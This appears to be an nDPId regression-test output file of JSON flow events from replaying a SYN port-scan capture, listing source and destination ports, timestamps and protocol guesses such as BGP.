-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1634,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":161,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1707,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":161,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1707,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":161,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":504,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":163,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":504,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":163,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2222,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2222,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1891,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":179,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"BGP","breed":"Acceptable","category":"Network"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1891,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":179,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1961,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":179,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"BGP","breed":"Acceptable","category":"Network"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1961,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":179,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":917,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4279,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":917,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4279,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":980,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4279,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":980,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4279,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1669,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8383,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1669,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8383,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1733,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8383,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1733,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8383,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":199,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":199,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":199,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":199,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6346,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1851,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2251,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1851,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2251,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":487,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6346,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":487,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1910,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061308,"flow_last_seen":1278275061308,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2251,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1910,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061308,"flow_last_seen":1278275061308,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2251,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":435,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8400,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":435,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8400,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":472,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8400,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":472,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8400,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1096,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8402,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1096,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8402,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8402,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8402,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1030,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":211,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1030,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":211,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1075,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":211,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1075,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":211,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
